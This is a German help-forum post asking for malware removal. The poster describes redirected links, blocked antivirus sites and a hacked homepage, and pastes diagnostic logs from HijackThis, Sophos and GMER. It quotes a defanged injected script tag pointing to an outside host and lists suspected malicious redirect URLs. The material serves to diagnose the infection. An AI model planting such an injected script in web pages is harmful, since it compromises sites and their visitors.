| |
| |||||||
Plagegeister aller Art und deren Bekämpfung: Links werden umgeleitet, AV Webseiten und Programme funktionieren nicht mehr, Homepage gehacktWindows 7 Wenn Du nicht sicher bist, ob Du dir Malware oder Trojaner eingefangen hast, erstelle hier ein Thema. Ein Experte wird sich mit weiteren Anweisungen melden und Dir helfen die Malware zu entfernen oder Unerwünschte Software zu deinstallieren bzw. zu löschen. Bitte schildere dein Problem so genau wie möglich. Sollte es ein Trojaner oder Viren Problem sein wird ein Experte Dir bei der Beseitigug der Infektion helfen. |
 |
25.06.2010, 20:42
| #1 | |
 |  Links werden umgeleitet, AV Webseiten und Programme funktionieren nicht mehr, Homepage gehackt Hallo, Nach einem Problem mit XP und der Systemreparatur funktionierte das automatische Update von Avira nicht mehr. Nach einem Scan mit Avira habe ich einige Dateien gelöscht, was aber keine Folgen hatte. Ich hab dann NOD32 draufgetan, aber auch hier funktioniert das Update nicht. Ein Scan mit der veralteten Signatur brachte nichts. Das Windows Update scheint noch zu funktionieren. Dabei habe ich aber gemerkt, daß ich viele Antivirus Webseiten nicht mehr aufrufen kann, egal ob mit Opera9 oder IE7. Es kommen unverständliche Fehlermeldungen: Zitat:
Windows-Dateischutz konnte eine Überprüfung der Systemdateien nicht initialisieren. Der spezifische Fehlercode ist 0x000006ba [Der RPC-Server ist nicht verfügbar.]. Außerdem werden Links in Opera abgeändert, vor allem in Google und ebay. Ziel sind dann Werbeseiten oder so Seiten wie Code:
ATTFilter hxxp:// ///www.safe-monitoring.in/sx1/404.php
hxxp:// ///www.safe-monitoring-2.in/sx1/voli9x1.php?ID=20677&fb=....
HijackThis mit Auswertung auf der Webseite brachte nichts eindeutiges nur 2 Fragezeichen. Malwarebytes startet, verschwindet aber nach ein paar Sekunden, OTH hat nicht geholfen. Bei Sophos Anti-Rootkit startet die GUI nicht, ich konnte aber über die Konsole einen Scan machen. Gmer ging mal, aber es wurde manchmal das System runtergefahren. Aktuell führt GMER zu einem Bluescreen. WinSCP führt zu vollständiger Systemauslastung und läßt sich dann auch nicht vollständig beenden (Prozeß bleibt aktiv). Auf meiner Homepage wurde folgender Code untergebracht: Code:
ATTFilter <script src=hxxp:/ /multiplemarketing.info/images/gifimg.php ></script>
Hier noch ein paar Logs, die aber schon ein paar Tage alt sind: HiJackThis: Code:
ATTFilter Logfile of Trend Micro HijackThis v2.0.4 Scan saved at 21:17:58, on 20.06.2010 Platform: Windows XP SP3 (WinNT 5.01.2600) MSIE: Internet Explorer v7.00 (7.00.6000.21256) Boot mode: Normal Running processes: C:\WINDOWS\System32\smss.exe C:\WINDOWS\system32\winlogon.exe C:\WINDOWS\system32\services.exe C:\WINDOWS\system32\lsass.exe C:\WINDOWS\system32\svchost.exe C:\WINDOWS\System32\svchost.exe C:\Programme\Intel\Wireless\Bin\S24EvMon.exe C:\WINDOWS\system32\spoolsv.exe C:\Programme\ESET\ESET NOD32 Antivirus\ekrn.exe C:\Programme\Intel\Wireless\Bin\EvtEng.exe C:\Programme\Nero\Nero 7\InCD\InCDsrv.exe C:\Programme\Gemeinsame Dateien\LightScribe\LSSrvc.exe C:\Programme\Intel\Wireless\Bin\RegSrvc.exe C:\WINDOWS\Explorer.EXE C:\WINDOWS\system32\igfxtray.exe C:\WINDOWS\system32\hkcmd.exe C:\Programme\Synaptics\SynTP\SynTPEnh.exe C:\Programme\Panasonic\Hotkey Appendix\HKEYAPP.EXE C:\Programme\Panasonic\WSwitch\WSwitch.exe C:\Programme\Nero\Nero 7\InCD\NBHGui.exe C:\Programme\Nero\Nero 7\InCD\InCD.exe C:\Programme\Elaborate Bytes\VirtualCloneDrive\VCDDaemon.exe C:\WINDOWS\system32\spool\drivers\w32x86\3\hpztsb04.exe C:\Programme\ESET\ESET NOD32 Antivirus\egui.exe C:\WINDOWS\system32\ctfmon.exe C:\Programme\Gemeinsame Dateien\LightScribe\LightScribeControlPanel.exe C:\Programme\Sandboxie\SbieSvc.exe C:\Programme\Sandboxie\SbieCtrl.exe C:\Programme\Sandboxie\SandboxieRpcSs.exe C:\WINDOWS\system32\wscntfy.exe C:\WINDOWS\system32\taskmgr.exe C:\Programme\Trend Micro\HiJackThis\HiJackThis.exe C:\Programme\Opera\opera.exe C:\WINDOWS\system32\NOTEPAD.EXE R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://go.microsoft.com/fwlink/?LinkId=54896 R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.de/ R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://go.microsoft.com/fwlink/?LinkId=69157 R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://go.microsoft.com/fwlink/?LinkId=54896 R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://go.microsoft.com/fwlink/?LinkId=54896 R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkId=69157 O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Programme\Gemeinsame Dateien\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Programme\Java\jre1.6.0_06\bin\ssv.dll O4 - HKLM\..\Run: [PCTVOICE] pctspk.exe O4 - HKLM\..\Run: [IgfxTray] C:\WINDOWS\system32\igfxtray.exe O4 - HKLM\..\Run: [HotKeysCmds] C:\WINDOWS\system32\hkcmd.exe O4 - HKLM\..\Run: [SynTPLpr] C:\Programme\Synaptics\SynTP\SynTPLpr.exe O4 - HKLM\..\Run: [SynTPEnh] C:\Programme\Synaptics\SynTP\SynTPEnh.exe O4 - HKLM\..\Run: [IntelZeroConfig] "C:\Programme\Intel\Wireless\bin\ZCfgSvc.exe" O4 - HKLM\..\Run: [IntelWireless] "C:\Programme\Intel\Wireless\Bin\ifrmewrk.exe" /tf Intel PROSet/Wireless O4 - HKLM\..\Run: [Hotkey] C:\WINDOWS\system32\hkeyman.exe O4 - HKLM\..\Run: [Panasonic Hotkey Manager] C:\Programme\Panasonic\Hotkey Appendix\HKEYAPP.EXE O4 - HKLM\..\Run: [WSwitch] C:\Programme\Panasonic\WSwitch\WSwitch.exe O4 - HKLM\..\Run: [PCinfo] C:\Programme\Panasonic\PCINFO\SetDiag.exe /FirstLogin O4 - HKLM\..\Run: [NeroFilterCheck] C:\Programme\Gemeinsame Dateien\Ahead\Lib\NeroCheck.exe O4 - HKLM\..\Run: [SecurDisc] C:\Programme\Nero\Nero 7\InCD\NBHGui.exe O4 - HKLM\..\Run: [InCD] C:\Programme\Nero\Nero 7\InCD\InCD.exe O4 - HKLM\..\Run: [VirtualCloneDrive] "C:\Programme\Elaborate Bytes\VirtualCloneDrive\VCDDaemon.exe" /s O4 - HKLM\..\Run: [HPDJ Taskbar Utility] C:\WINDOWS\system32\spool\drivers\w32x86\3\hpztsb04.exe O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Programme\Adobe\Reader 9.0\Reader\Reader_sl.exe" O4 - HKLM\..\Run: [Adobe ARM] "C:\Programme\Gemeinsame Dateien\Adobe\ARM\1.0\AdobeARM.exe" O4 - HKLM\..\Run: [egui] "C:\Programme\ESET\ESET NOD32 Antivirus\egui.exe" /hide /waitservice O4 - HKLM\..\RunOnce: [Malwarebytes' Anti-Malware] C:\Programme\Malwarebytes' Anti-Malware\mbamgui.exe /install /silent O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\ctfmon.exe O4 - HKCU\..\Run: [SandboxieControl] "C:\Programme\Sandboxie\SbieCtrl.exe" O4 - HKCU\..\Run: [LightScribe Control Panel] C:\Programme\Gemeinsame Dateien\LightScribe\LightScribeControlPanel.exe -hidden O4 - HKUS\S-1-5-20\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'NETZWERKDIENST') O4 - HKUS\S-1-5-20\..\RunOnce: [nltide_3] rundll32 advpack.dll,LaunchINFSectionEx nLite.inf,C,,4,N (User 'NETZWERKDIENST') O4 - HKUS\S-1-5-20\..\RunOnce: [ShowDeskFix] regsvr32 /s /n /i:u shell32 (User 'NETZWERKDIENST') O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SYSTEM') O4 - HKUS\S-1-5-18\..\RunOnce: [nltide_3] rundll32 advpack.dll,LaunchINFSectionEx nLite.inf,C,,4,N (User 'SYSTEM') O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'Default user') O4 - HKUS\.DEFAULT\..\RunOnce: [nltide_3] rundll32 advpack.dll,LaunchINFSectionEx nLite.inf,C,,4,N (User 'Default user') O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Programme\Java\jre1.6.0_06\bin\ssv.dll O9 - Extra 'Tools' menuitem: Sun Java Konsole - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Programme\Java\jre1.6.0_06\bin\ssv.dll O9 - Extra button: Run WinHTTrack - {36ECAF82-3300-8F84-092E-AFF36D6C7040} - C:\Programme\WinHTTrack\WinHTTrackIEBar.dll O9 - Extra 'Tools' menuitem: Launch WinHTTrack - {36ECAF82-3300-8F84-092E-AFF36D6C7040} - C:\Programme\WinHTTrack\WinHTTrackIEBar.dll O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Programme\Messenger\msmsgs.exe O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Programme\Messenger\msmsgs.exe O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - hxxp://update.microsoft.com/microsoftupdate/v6/V5Controls/en/x86/client/wuweb_site.cab?1276015979588 O16 - DPF: {6E32070A-766D-4EE6-879C-DC1FA91D2FC3} (MUWebControl Class) - hxxp://update.microsoft.com/microsoftupdate/v6/V5Controls/en/x86/client/muweb_site.cab?1276015904580 O17 - HKLM\System\CCS\Services\Tcpip\..\{D9AE09D2-9DAE-46C5-93FE-0DC1FCBB848E}: NameServer = 217.0.43.161 217.0.43.177 O22 - SharedTaskScheduler: Browseui preloader - {438755C2-A8BA-11D1-B96B-00A0C90312E1} - C:\WINDOWS\system32\browseui.dll O22 - SharedTaskScheduler: Component Categories cache daemon - {8C7461EF-2B13-11d2-BE35-3078302C2030} - C:\WINDOWS\system32\browseui.dll O23 - Service: ESET HTTP Server (EhttpSrv) - ESET - C:\Programme\ESET\ESET NOD32 Antivirus\EHttpSrv.exe O23 - Service: ESET Service (ekrn) - ESET - C:\Programme\ESET\ESET NOD32 Antivirus\ekrn.exe O23 - Service: Intel(R) PROSet/Wireless Event Log (EvtEng) - Intel Corporation - C:\Programme\Intel\Wireless\Bin\EvtEng.exe O23 - Service: InCD Helper (InCDsrv) - Nero AG - C:\Programme\Nero\Nero 7\InCD\InCDsrv.exe O23 - Service: LightScribeService Direct Disc Labeling Service (LightScribeService) - Hewlett-Packard Company - C:\Programme\Gemeinsame Dateien\LightScribe\LSSrvc.exe O23 - Service: NBService - Nero AG - C:\Programme\Nero\Nero 7\Nero BackItUp\NBService.exe O23 - Service: NMIndexingService - Nero AG - C:\Programme\Gemeinsame Dateien\Ahead\Lib\NMIndexingService.exe O23 - Service: Intel(R) PROSet/Wireless Registry Service (RegSrvc) - Intel Corporation - C:\Programme\Intel\Wireless\Bin\RegSrvc.exe O23 - Service: Intel(R) PROSet/Wireless Service (S24EventMonitor) - Intel Corporation - C:\Programme\Intel\Wireless\Bin\S24EvMon.exe O23 - Service: Sandboxie Service (SbieSvc) - tzuk - C:\Programme\Sandboxie\SbieSvc.exe -- End of file - 8080 bytes Sophos: Code:
ATTFilter Sophos Anti-Rootkit Version 1.5.0 (c) 2009 Sophos Plc
Started logging on 19.06.2010 at 23:00:57
User "***" on computer "TOUGHBOOK"
Windows version 5.1 SP 3.0 Service Pack 3 build 2600 SM=0x100 PT=0x1 Win32
Info: Starting process scan.
Info: Starting registry scan.
Hidden: registry item \HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32\midi9
Info: Starting disk scan of C: (NTFS).
Hidden: file C:\Dokumente und Einstellungen\***\Lokale Einstellungen\Anwendungsdaten\Opera\Opera\profile\images\http%3A%2F%2Fwww.pcgameshardware.de%2Faid,690398%2FVergleich-1980-zu-2009-Wie-schwer-und-teuer-ist-1-Petabyte-Datenspeicher%2FLaufwerk%2FNews%2Ffavicon.ico
Hidden: file C:\Dokumente und Einstellungen\***\Lokale Einstellungen\Anwendungsdaten\Opera\Opera\profile\images\http%3A%2F%2Fwww.pcgameshardware.de%2Faid,676309%2FUSB-30-Die-wichtigsten-Infos-zum-neuen-Technologie-Standard-Update%2FTechnologie%2FWissen%2Ffavicon.ico
Hidden: file C:\Dokumente und Einstellungen\***\Lokale Einstellungen\Anwendungsdaten\Opera\Opera\profile\images\http%3A%2F%2Fwww.pcgameshardware.de%2Faid,654197%2FDer-PCGH-Rivatuner-Guide-Teil-1-Einrichtung-und-Grundlagen%2FGrafikkarte%2FBildergalerie%2Ffavicon.ico
Hidden: file C:\Dokumente und Einstellungen\***\Lokale Einstellungen\Anwendungsdaten\Opera\Opera\profile\images\http%3A%2F%2Fwww.pcgameshardware.de%2Faid,678008%2FWestern-Digital-Caviar-Green-WD20EADS-2-Terabyte-Festplatte-im-Kurztest%2FLaufwerk%2FTest%2Ffavicon.ico
Info: Starting disk scan of D: (FAT).
Stopped logging on 19.06.2010 at 23:59:28
Gmer: Code:
ATTFilter GMER 1.0.15.15281 - hxxp://www.gmer.net
Rootkit scan 2010-06-18 15:38:22
Windows 5.1.2600 Service Pack 3
Running: ins7dh0h.exe; Driver: C:\DOKUME~1\***\LOKALE~1\Temp\fwrdipod.sys
---- System - GMER 1.0.15 ----
SSDT \SystemRoot\system32\DRIVERS\ehdrv.sys (ESET Helper driver/ESET) ZwAssignProcessToJobObject [0xEE16F610]
SSDT \SystemRoot\system32\DRIVERS\ehdrv.sys (ESET Helper driver/ESET) ZwDebugActiveProcess [0xEE16FC10]
SSDT \SystemRoot\system32\DRIVERS\ehdrv.sys (ESET Helper driver/ESET) ZwDuplicateObject [0xEE16F730]
SSDT \SystemRoot\system32\DRIVERS\ehdrv.sys (ESET Helper driver/ESET) ZwOpenProcess [0xEE16F4B0]
SSDT \SystemRoot\system32\DRIVERS\ehdrv.sys (ESET Helper driver/ESET) ZwOpenThread [0xEE16F570]
SSDT \SystemRoot\system32\DRIVERS\ehdrv.sys (ESET Helper driver/ESET) ZwProtectVirtualMemory [0xEE16F6D0]
SSDT \SystemRoot\system32\DRIVERS\ehdrv.sys (ESET Helper driver/ESET) ZwSetContextThread [0xEE16F690]
SSDT \SystemRoot\system32\DRIVERS\ehdrv.sys (ESET Helper driver/ESET) ZwSetInformationThread [0xEE16F650]
SSDT \SystemRoot\system32\DRIVERS\ehdrv.sys (ESET Helper driver/ESET) ZwSetSecurityObject [0xEE16F7D0]
SSDT \SystemRoot\system32\DRIVERS\ehdrv.sys (ESET Helper driver/ESET) ZwSuspendProcess [0xEE16F510]
SSDT \SystemRoot\system32\DRIVERS\ehdrv.sys (ESET Helper driver/ESET) ZwSuspendThread [0xEE16F590]
SSDT \SystemRoot\system32\DRIVERS\ehdrv.sys (ESET Helper driver/ESET) ZwTerminateProcess [0xEE16F4D0]
SSDT \SystemRoot\system32\DRIVERS\ehdrv.sys (ESET Helper driver/ESET) ZwTerminateThread [0xEE16F5D0]
SSDT \SystemRoot\system32\DRIVERS\ehdrv.sys (ESET Helper driver/ESET) ZwWriteVirtualMemory [0xEE16F750]
---- Kernel code sections - GMER 1.0.15 ----
.text win32k.sys!EngAcquireSemaphore + 20E2 BF8082E8 5 Bytes JMP 852964D0
.text win32k.sys!EngFreeUserMem + 5BD2 BF80EE6F 5 Bytes JMP 85296430
.text win32k.sys!EngMulDiv + 8195 BF872D39 5 Bytes JMP 85296610
.text win32k.sys!XLATEOBJ_iXlate + 405D BF878F07 5 Bytes JMP 85296750
.text win32k.sys!EngCreatePalette + 1C0 BF87EA6A 5 Bytes JMP 85296570
.text win32k.sys!EngAlphaBlend + 2998 BF8C3163 5 Bytes JMP 852966B0
.text win32k.sys!PATHOBJ_bCloseFigure + 19F1 BF8F97FA 5 Bytes JMP 852967F0
---- User code sections - GMER 1.0.15 ----
.text C:\WINDOWS\system32\igfxtray.exe[264] ntdll.dll!NtOpenKey 7C91D5CE 5 Bytes JMP 10023DF4
.text C:\WINDOWS\system32\igfxtray.exe[264] kernel32.dll!CreateProcessW 7C802336 5 Bytes JMP 10023C3C
.text C:\WINDOWS\system32\igfxtray.exe[264] kernel32.dll!ExitProcess 7C81CB12 5 Bytes JMP 10023E78
.text C:\WINDOWS\system32\igfxtray.exe[264] ws2_32.dll!connect 71A14A07 5 Bytes JMP 10023AF0
.text C:\WINDOWS\system32\igfxtray.exe[264] ws2_32.dll!send 71A14C27 5 Bytes JMP 10023264
.text C:\WINDOWS\system32\igfxtray.exe[264] ws2_32.dll!WSARecv 71A14CB5 5 Bytes JMP 100227F8
.text C:\WINDOWS\system32\igfxtray.exe[264] ws2_32.dll!recv 71A1676F 5 Bytes JMP 1002278C
.text C:\WINDOWS\system32\igfxtray.exe[264] ws2_32.dll!WSASend 71A168FA 5 Bytes JMP 10023A9C
.text C:\WINDOWS\system32\hkcmd.exe[320] ntdll.dll!NtOpenKey 7C91D5CE 5 Bytes JMP 10023DF4
.text C:\WINDOWS\system32\hkcmd.exe[320] kernel32.dll!CreateProcessW 7C802336 5 Bytes JMP 10023C3C
.text C:\WINDOWS\system32\hkcmd.exe[320] kernel32.dll!ExitProcess 7C81CB12 5 Bytes JMP 10023E78
.text C:\WINDOWS\system32\hkcmd.exe[320] ws2_32.dll!connect 71A14A07 5 Bytes JMP 10023AF0
.text C:\WINDOWS\system32\hkcmd.exe[320] ws2_32.dll!send 71A14C27 5 Bytes JMP 10023264
.text C:\WINDOWS\system32\hkcmd.exe[320] ws2_32.dll!WSARecv 71A14CB5 5 Bytes JMP 100227F8
.text C:\WINDOWS\system32\hkcmd.exe[320] ws2_32.dll!recv 71A1676F 5 Bytes JMP 1002278C
.text C:\WINDOWS\system32\hkcmd.exe[320] ws2_32.dll!WSASend 71A168FA 5 Bytes JMP 10023A9C
.text C:\Programme\Intel\Wireless\Bin\RegSrvc.exe[344] ntdll.dll!NtOpenKey 7C91D5CE 5 Bytes JMP 10003DF4
.text C:\Programme\Intel\Wireless\Bin\RegSrvc.exe[344] kernel32.dll!CreateProcessW 7C802336 5 Bytes JMP 10003C3C
.text C:\Programme\Intel\Wireless\Bin\RegSrvc.exe[344] kernel32.dll!ExitProcess 7C81CB12 5 Bytes JMP 10003E78
.text C:\Programme\Intel\Wireless\Bin\RegSrvc.exe[344] ws2_32.dll!connect 71A14A07 5 Bytes JMP 10003AF0
.text C:\Programme\Intel\Wireless\Bin\RegSrvc.exe[344] ws2_32.dll!send 71A14C27 5 Bytes JMP 10003264
.text C:\Programme\Intel\Wireless\Bin\RegSrvc.exe[344] ws2_32.dll!WSARecv 71A14CB5 5 Bytes JMP 100027F8
.text C:\Programme\Intel\Wireless\Bin\RegSrvc.exe[344] ws2_32.dll!recv 71A1676F 5 Bytes JMP 1000278C
.text C:\Programme\Intel\Wireless\Bin\RegSrvc.exe[344] ws2_32.dll!WSASend 71A168FA 5 Bytes JMP 10003A9C
.text C:\Programme\Synaptics\SynTP\SynTPEnh.exe[364] ntdll.dll!NtOpenKey 7C91D5CE 5 Bytes JMP 10003DF4
.text C:\Programme\Synaptics\SynTP\SynTPEnh.exe[364] kernel32.dll!CreateProcessW 7C802336 5 Bytes JMP 10003C3C
.text C:\Programme\Synaptics\SynTP\SynTPEnh.exe[364] kernel32.dll!ExitProcess 7C81CB12 5 Bytes JMP 10003E78
.text C:\Programme\Synaptics\SynTP\SynTPEnh.exe[364] ws2_32.dll!connect 71A14A07 5 Bytes JMP 10003AF0
.text C:\Programme\Synaptics\SynTP\SynTPEnh.exe[364] ws2_32.dll!send 71A14C27 5 Bytes JMP 10003264
.text C:\Programme\Synaptics\SynTP\SynTPEnh.exe[364] ws2_32.dll!WSARecv 71A14CB5 5 Bytes JMP 100027F8
.text C:\Programme\Synaptics\SynTP\SynTPEnh.exe[364] ws2_32.dll!recv 71A1676F 5 Bytes JMP 1000278C
.text C:\Programme\Synaptics\SynTP\SynTPEnh.exe[364] ws2_32.dll!WSASend 71A168FA 5 Bytes JMP 10003A9C
.text C:\Programme\Nero\Nero 7\InCD\NBHGui.exe[440] ntdll.dll!NtOpenKey 7C91D5CE 5 Bytes JMP 10003DF4
.text C:\Programme\Nero\Nero 7\InCD\NBHGui.exe[440] kernel32.dll!CreateProcessW 7C802336 5 Bytes JMP 10003C3C
.text C:\Programme\Nero\Nero 7\InCD\NBHGui.exe[440] kernel32.dll!ExitProcess 7C81CB12 5 Bytes JMP 10003E78
.text C:\Programme\Nero\Nero 7\InCD\NBHGui.exe[440] ws2_32.dll!connect 71A14A07 5 Bytes JMP 10003AF0
.text C:\Programme\Nero\Nero 7\InCD\NBHGui.exe[440] ws2_32.dll!send 71A14C27 5 Bytes JMP 10003264
.text C:\Programme\Nero\Nero 7\InCD\NBHGui.exe[440] ws2_32.dll!WSARecv 71A14CB5 5 Bytes JMP 100027F8
.text C:\Programme\Nero\Nero 7\InCD\NBHGui.exe[440] ws2_32.dll!recv 71A1676F 5 Bytes JMP 1000278C
.text C:\Programme\Nero\Nero 7\InCD\NBHGui.exe[440] ws2_32.dll!WSASend 71A168FA 5 Bytes JMP 10003A9C
.text C:\Programme\Sandboxie\SbieSvc.exe[444] ntdll.dll!NtOpenKey 7C91D5CE 5 Bytes JMP 10003DF4
.text C:\Programme\Sandboxie\SbieSvc.exe[444] kernel32.dll!CreateProcessW 7C802336 5 Bytes JMP 10003C3C
.text C:\Programme\Sandboxie\SbieSvc.exe[444] kernel32.dll!ExitProcess 7C81CB12 5 Bytes JMP 10003E78
.text C:\Programme\Sandboxie\SbieSvc.exe[444] ws2_32.dll!connect 71A14A07 5 Bytes JMP 10003AF0
.text C:\Programme\Sandboxie\SbieSvc.exe[444] ws2_32.dll!send 71A14C27 5 Bytes JMP 10003264
.text C:\Programme\Sandboxie\SbieSvc.exe[444] ws2_32.dll!WSARecv 71A14CB5 5 Bytes JMP 100027F8
.text C:\Programme\Sandboxie\SbieSvc.exe[444] ws2_32.dll!recv 71A1676F 5 Bytes JMP 1000278C
.text C:\Programme\Sandboxie\SbieSvc.exe[444] ws2_32.dll!WSASend 71A168FA 5 Bytes JMP 10003A9C
.text C:\Programme\Panasonic\Hotkey Appendix\HKEYAPP.EXE[484] ntdll.dll!NtOpenKey 7C91D5CE 5 Bytes JMP 10003DF4
.text C:\Programme\Panasonic\Hotkey Appendix\HKEYAPP.EXE[484] kernel32.dll!CreateProcessW 7C802336 5 Bytes JMP 10003C3C
.text C:\Programme\Panasonic\Hotkey Appendix\HKEYAPP.EXE[484] kernel32.dll!ExitProcess 7C81CB12 5 Bytes JMP 10003E78
.text C:\Programme\Panasonic\Hotkey Appendix\HKEYAPP.EXE[484] ws2_32.dll!connect 71A14A07 5 Bytes JMP 10003AF0
.text C:\Programme\Panasonic\Hotkey Appendix\HKEYAPP.EXE[484] ws2_32.dll!send 71A14C27 5 Bytes JMP 10003264
.text C:\Programme\Panasonic\Hotkey Appendix\HKEYAPP.EXE[484] ws2_32.dll!WSARecv 71A14CB5 5 Bytes JMP 100027F8
.text C:\Programme\Panasonic\Hotkey Appendix\HKEYAPP.EXE[484] ws2_32.dll!recv 71A1676F 5 Bytes JMP 1000278C
.text C:\Programme\Panasonic\Hotkey Appendix\HKEYAPP.EXE[484] ws2_32.dll!WSASend 71A168FA 5 Bytes JMP 10003A9C
.text C:\Programme\Panasonic\WSwitch\WSwitch.exe[516] ntdll.dll!NtOpenKey 7C91D5CE 5 Bytes JMP 10003DF4
.text C:\Programme\Panasonic\WSwitch\WSwitch.exe[516] kernel32.dll!CreateProcessW 7C802336 5 Bytes JMP 10003C3C
.text C:\Programme\Panasonic\WSwitch\WSwitch.exe[516] kernel32.dll!ExitProcess 7C81CB12 5 Bytes JMP 10003E78
.text C:\Programme\Panasonic\WSwitch\WSwitch.exe[516] ws2_32.dll!connect 71A14A07 5 Bytes JMP 10003AF0
.text C:\Programme\Panasonic\WSwitch\WSwitch.exe[516] ws2_32.dll!send 71A14C27 5 Bytes JMP 10003264
.text C:\Programme\Panasonic\WSwitch\WSwitch.exe[516] ws2_32.dll!WSARecv 71A14CB5 5 Bytes JMP 100027F8
.text C:\Programme\Panasonic\WSwitch\WSwitch.exe[516] ws2_32.dll!recv 71A1676F 5 Bytes JMP 1000278C
.text C:\Programme\Panasonic\WSwitch\WSwitch.exe[516] ws2_32.dll!WSASend 71A168FA 5 Bytes JMP 10003A9C
.text C:\WINDOWS\Explorer.EXE[612] ntdll.dll!NtOpenKey 7C91D5CE 5 Bytes JMP 10003DF4
.text C:\WINDOWS\Explorer.EXE[612] kernel32.dll!CreateProcessW 7C802336 5 Bytes JMP 10003C3C
.text C:\WINDOWS\Explorer.EXE[612] kernel32.dll!ExitProcess 7C81CB12 5 Bytes JMP 10003E78
.text C:\WINDOWS\Explorer.EXE[612] ws2_32.dll!connect 71A14A07 5 Bytes JMP 10003AF0
.text C:\WINDOWS\Explorer.EXE[612] ws2_32.dll!send 71A14C27 5 Bytes JMP 10003264
.text C:\WINDOWS\Explorer.EXE[612] ws2_32.dll!WSARecv 71A14CB5 5 Bytes JMP 100027F8
.text C:\WINDOWS\Explorer.EXE[612] ws2_32.dll!recv 71A1676F 5 Bytes JMP 1000278C
.text C:\WINDOWS\Explorer.EXE[612] ws2_32.dll!WSASend 71A168FA 5 Bytes JMP 10003A9C
.text C:\WINDOWS\system32\spool\drivers\w32x86\3\hpztsb04.exe[656] ntdll.dll!NtOpenKey 7C91D5CE 5 Bytes JMP 10003DF4
.text C:\WINDOWS\system32\spool\drivers\w32x86\3\hpztsb04.exe[656] kernel32.dll!CreateProcessW 7C802336 5 Bytes JMP 10003C3C
.text C:\WINDOWS\system32\spool\drivers\w32x86\3\hpztsb04.exe[656] kernel32.dll!ExitProcess 7C81CB12 5 Bytes JMP 10003E78
.text C:\WINDOWS\system32\spool\drivers\w32x86\3\hpztsb04.exe[656] ws2_32.dll!connect 71A14A07 5 Bytes JMP 10003AF0
.text C:\WINDOWS\system32\spool\drivers\w32x86\3\hpztsb04.exe[656] ws2_32.dll!send 71A14C27 5 Bytes JMP 10003264
.text C:\WINDOWS\system32\spool\drivers\w32x86\3\hpztsb04.exe[656] ws2_32.dll!WSARecv 71A14CB5 5 Bytes JMP 100027F8
.text C:\WINDOWS\system32\spool\drivers\w32x86\3\hpztsb04.exe[656] ws2_32.dll!recv 71A1676F 5 Bytes JMP 1000278C
.text C:\WINDOWS\system32\spool\drivers\w32x86\3\hpztsb04.exe[656] ws2_32.dll!WSASend 71A168FA 5 Bytes JMP 10003A9C
.text C:\Programme\Elaborate Bytes\VirtualCloneDrive\VCDDaemon.exe[708] ntdll.dll!NtOpenKey 7C91D5CE 5 Bytes JMP 10023DF4
.text C:\Programme\Elaborate Bytes\VirtualCloneDrive\VCDDaemon.exe[708] kernel32.dll!CreateProcessW 7C802336 5 Bytes JMP 10023C3C
.text C:\Programme\Elaborate Bytes\VirtualCloneDrive\VCDDaemon.exe[708] kernel32.dll!ExitProcess 7C81CB12 5 Bytes JMP 10023E78
.text C:\Programme\Elaborate Bytes\VirtualCloneDrive\VCDDaemon.exe[708] ws2_32.dll!connect 71A14A07 5 Bytes JMP 10023AF0
.text C:\Programme\Elaborate Bytes\VirtualCloneDrive\VCDDaemon.exe[708] ws2_32.dll!send 71A14C27 5 Bytes JMP 10023264
.text C:\Programme\Elaborate Bytes\VirtualCloneDrive\VCDDaemon.exe[708] ws2_32.dll!WSARecv 71A14CB5 5 Bytes JMP 100227F8
.text C:\Programme\Elaborate Bytes\VirtualCloneDrive\VCDDaemon.exe[708] ws2_32.dll!recv 71A1676F 5 Bytes JMP 1002278C
.text C:\Programme\Elaborate Bytes\VirtualCloneDrive\VCDDaemon.exe[708] ws2_32.dll!WSASend 71A168FA 5 Bytes JMP 10023A9C
.text C:\WINDOWS\system32\winlogon.exe[764] ntdll.dll!NtOpenKey 7C91D5CE 5 Bytes JMP 10003DF4
.text C:\WINDOWS\system32\winlogon.exe[764] kernel32.dll!CreateProcessW 7C802336 5 Bytes JMP 10003C3C
.text C:\WINDOWS\system32\winlogon.exe[764] kernel32.dll!ExitProcess 7C81CB12 5 Bytes JMP 10003E78
.text C:\WINDOWS\system32\winlogon.exe[764] WS2_32.dll!connect 71A14A07 5 Bytes JMP 10003AF0
.text C:\WINDOWS\system32\winlogon.exe[764] WS2_32.dll!send 71A14C27 5 Bytes JMP 10003264
.text C:\WINDOWS\system32\winlogon.exe[764] WS2_32.dll!WSARecv 71A14CB5 5 Bytes JMP 100027F8
.text C:\WINDOWS\system32\winlogon.exe[764] WS2_32.dll!recv 71A1676F 5 Bytes JMP 1000278C
